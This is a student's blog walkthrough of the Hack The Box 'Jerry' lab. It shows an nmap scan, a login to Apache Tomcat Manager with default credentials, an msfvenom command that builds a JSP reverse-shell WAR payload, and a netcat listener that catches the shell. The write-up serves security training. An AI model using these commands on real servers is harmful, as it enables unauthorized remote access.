Edward Qiu

Computer Science Student

Hack The Box - Jerry Walkthrough

Scope

HTB Jerry Scope

Tools

Walkthrough

Let's do a port scan to find if there are any services running.

nmap -sC -sV -oA nmap/initial -vvv 10.10.10.95

HTB Jerry nmap scan

We found Apache Tomcat with http is running on port 8080, so let's check what is being served at 10.10.10.95:8080.

HTB Jerry - Landing web page

Manager App looks interesting. Upon clicking on it, we are greeted with a login prompt.

HTB Jerry - Web login

Upon clicking cancel, we are greeted with an example of default credentials for Tomcat.

HTB Jerry - Web 401 Error

If we put those credentials into the login prompt from earlier, we reach the console page.

HTB Jerry - Tomcat Manager App

We see a place upload a file, so let's use msfvenom to generate a payload to get reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.251 LPORT=44 -f war > shelle0.war

HTB Jerry - msfvenon reverse shell payload

Next we upload the payload and go to 10.10.10.95:8080/shelle0/

HTB Jerry - Tomcat Manager App with msfvenom reverse shell payload uploaded

Then we use netcat on port 44 get shell.

nc -l -v -p 44

HTB Jerry - reverse shell with netcat

With some poking around, we find some logins for Tomcat

HTB Jerry - Tomcat Users Credentials

Now if we navigate to the desktop of the Administrator account, we find the flags.

HTB Jerry - Flags

Lessons

  • Never use default credentials

Resources

Here is a list of resources I used at some point while working on Jerry:

Similar Posts